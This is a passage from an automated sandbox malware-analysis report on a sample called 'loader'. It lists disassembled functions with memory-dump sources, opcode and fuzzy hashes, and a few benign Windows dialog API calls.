                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: a78968490406cf0f7c3b7f15faaf16f3f44976f4236a69571d2d170a545ea94c
                                                                                    • Instruction ID: e306f457fe57d25dd0a208af1da17aa0ce9df74b427e1c537b391391c72b2726
                                                                                    • Opcode Fuzzy Hash: a78968490406cf0f7c3b7f15faaf16f3f44976f4236a69571d2d170a545ea94c
                                                                                    • Instruction Fuzzy Hash: F3D196B1A083458FDB14DF28C84479BBBE2BF89708F04456DF8859B342D774E949CB5A
                                                                                    Function 0063E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ba6607d86ad66757135bc19b32e42856b1c66e1c5db48918592d5fadd4d40f41
                                                                                    • Instruction ID: c358a6daef4d51ed22b7998d3d1c3bee731a51db023eff9af7604cfd7edf8a7f
                                                                                    • Opcode Fuzzy Hash: ba6607d86ad66757135bc19b32e42856b1c66e1c5db48918592d5fadd4d40f41
                                                                                    • Instruction Fuzzy Hash: D1E16E755183908FC304CF29D88046ABFF1AF9A300F450A5EF9CA97352C335E959DBA2
                                                                                    Function 00644088 Relevance: .3, Instructions: 270COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bdd905523024b1a81dffebe9362614b7b3c72694795fef4592432a912841a325
                                                                                    • Instruction ID: 6d6f9717bd132cfacf2345687153d64c3e7871eae9f15ba8de0ac85965c2ba2c
                                                                                    • Opcode Fuzzy Hash: bdd905523024b1a81dffebe9362614b7b3c72694795fef4592432a912841a325
                                                                                    • Instruction Fuzzy Hash: 189146B02003499BDB24EFA4D892BFA77D7EBA0304F10092DF99687382DE749645D796
                                                                                    Function 006619F4 Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3112bff31575a83f01863fda650d4ddf0d33e6faf59d17beb6bbfc348506c3e4
                                                                                    • Instruction ID: 12d90e1049b824a121b7143299c3092e1e902be245591ed0ac7f42301612f8fd
                                                                                    • Opcode Fuzzy Hash: 3112bff31575a83f01863fda650d4ddf0d33e6faf59d17beb6bbfc348506c3e4
                                                                                    • Instruction Fuzzy Hash: 18B13E31610609DFD715CF28C486BA97BE1FF46365F298658E899CF3A1C339D992CB40
                                                                                    Function 006443BF Relevance: .2, Instructions: 243COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                    • Instruction ID: a12e59b287ef53bd733cec44a302e3809db94bc47de63178c79a7f839686a553
                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                    • Instruction Fuzzy Hash: 3B812A717043464BEF28DE68C8D2BBD77D7EB91304F00092DE9C68B282DE748986C756
                                                                                    Function 006551C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1da6095977aca77bd2dbeee5cafb216a83025cbb48bb6a8820e46f2981fb5bba
                                                                                    • Instruction ID: dd461f3c2b9f9f92b0306cf293910b0963a77f3d1e36eaa28e016dd8a15d0871
                                                                                    • Opcode Fuzzy Hash: 1da6095977aca77bd2dbeee5cafb216a83025cbb48bb6a8820e46f2981fb5bba
                                                                                    • Instruction Fuzzy Hash: AE614631A10F0956DA389A6898BD7FE2397EB01343F14051EEC87DF381E691DE8E8715
                                                                                    Function 00654F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                    • Instruction ID: 95638f482e7f2c3fae9a88f109afed20ac405d086001fc93b09320c8b5e4e956
                                                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                    • Instruction Fuzzy Hash: FA513570200E4557DB74556884BEBFF67D79B5230BF18085AEC83CB382CA05AD8E8396
                                                                                    Function 04FF606C Relevance: .2, Instructions: 201COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2189140272.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4ff0000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c28ffcec8f2e53bbe991ded8c2dc418df6520a3de38b5081a879aecabca425a3
                                                                                    • Instruction ID: 3b1f6743c394aa3fc5802f77949fc75730ae0c9b42fbfab9a98173913d76f6f8
                                                                                    • Opcode Fuzzy Hash: c28ffcec8f2e53bbe991ded8c2dc418df6520a3de38b5081a879aecabca425a3
                                                                                    • Instruction Fuzzy Hash: 27815D76D0122A8FCFA5DF25CD886A9B7B5AF44701F5681DADC0AB3250EB315E85CF40
                                                                                    Function 04FF6391 Relevance: .2, Instructions: 165COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2189140272.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4ff0000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 42d54af0fbed653634bf9021618caea234602afc6b75b0153fbb4b46d4c22a94
                                                                                    • Instruction ID: c8bb727a293c23f69e4de50643553fe2ddd5dc986fc501b842b1e242c9b9ec0e
                                                                                    • Opcode Fuzzy Hash: 42d54af0fbed653634bf9021618caea234602afc6b75b0153fbb4b46d4c22a94
                                                                                    • Instruction Fuzzy Hash: BF615E75D0122A9FCFA59F29CC886D9B7B5BF44311F1282D9D84EA3250EB309E85DF50
                                                                                    Function 0063EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c94adf60d45b9d667e809d5343a1d511604f02beb80f3b174c4725e45c499bb7
                                                                                    • Instruction ID: d66a0c4be01df5a1e70017ffad08059680699fd4bd77e621a1a5834e75ec4ba8
                                                                                    • Opcode Fuzzy Hash: c94adf60d45b9d667e809d5343a1d511604f02beb80f3b174c4725e45c499bb7
                                                                                    • Instruction Fuzzy Hash: 0F51D5359083D58FD711CF38D5504AEBFE2AE9A314F4909ADE4D95B343C221DA4ACBA2
                                                                                    Function 0064F654 Relevance: .1, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3950f36532a62692ed512f336a9ae1aa589cd57bf653e38fa9e6be0a6e778e26
                                                                                    • Instruction ID: 07b648d98a2207eb03c65a428fc6d60881e16885eb6059660171a84793dd2f56
                                                                                    • Opcode Fuzzy Hash: 3950f36532a62692ed512f336a9ae1aa589cd57bf653e38fa9e6be0a6e778e26
                                                                                    • Instruction Fuzzy Hash: 295190B19006198FEB24CF98E9817EABBF6FB48314F24993AD401EB350D375D905CB90
                                                                                    Function 006400B7 Relevance: .1, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c27b04208c503ae81dc6656f218db141cc39ea20f607b1605b2f698e5ae3e54a
                                                                                    • Instruction ID: 8a1f9b47af610fec543594c217b563069e6816c035d2be11bc3eb981b4bf6337
                                                                                    • Opcode Fuzzy Hash: c27b04208c503ae81dc6656f218db141cc39ea20f607b1605b2f698e5ae3e54a
                                                                                    • Instruction Fuzzy Hash: CB51DFB1A087119FC748CF19D88055AF7E1FF88314F058A2EE899E3340D734EA59CB9A
                                                                                    Function 00643E0B Relevance: .1, Instructions: 112COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                    • Instruction ID: 8db51d4d33ff8169978aa15ccbf6a6024a07d8682549f7ffb57504781d3fc5e7
                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                    • Instruction Fuzzy Hash: B6314AB1A047568FCB54DF28C8512AEBBE1FB95304F10492DE4C5C7742C734EA0ACB92
                                                                                    Function 0064C220 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 286windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0064C2B1
                                                                                    • EndDialog.USER32(?,00000006), ref: 0064C2C4
                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0064C2E0
                                                                                    • SetFocus.USER32(00000000), ref: 0064C2E7
                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0064C321
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0064C358
                                                                                    • _swprintf.LIBCMT ref: 0064C404
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0064C417
                                                                                    • _swprintf.LIBCMT ref: 0064C477
                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0064C48A
                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0064C4A7
                                                                                    • _swprintf.LIBCMT ref: 0064C535
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0064C548
                                                                                    • _swprintf.LIBCMT ref: 0064C59C
                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0064C5AF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Item$Text$_swprintf$MessageSend$DialogFocusWindow__vswprintf_c_l
                                                                                    • String ID: %s %s$%s %s %s$Pd$REPLACEFILEDLG
                                                                                    • API String ID: 902387417-3312844388
                                                                                    • Opcode ID: ce115b4c90bd33aa12df9269a145852656f0fb165597cbd83069bdc9382e4ae5
                                                                                    • Instruction ID: 6585643879c43a1bfa95a6951fc728a591059072d0dea342f1ccaefcd7b82055
                                                                                    • Opcode Fuzzy Hash: ce115b4c90bd33aa12df9269a145852656f0fb165597cbd83069bdc9382e4ae5
                                                                                    • Instruction Fuzzy Hash: F591A572248354BBD361DBA0CC49FFB77AEEB8A714F004819F649D6291D7B1EB048762
                                                                                    Function 0063E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0063E30E
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • _strlen.LIBCMT ref: 0063E32F
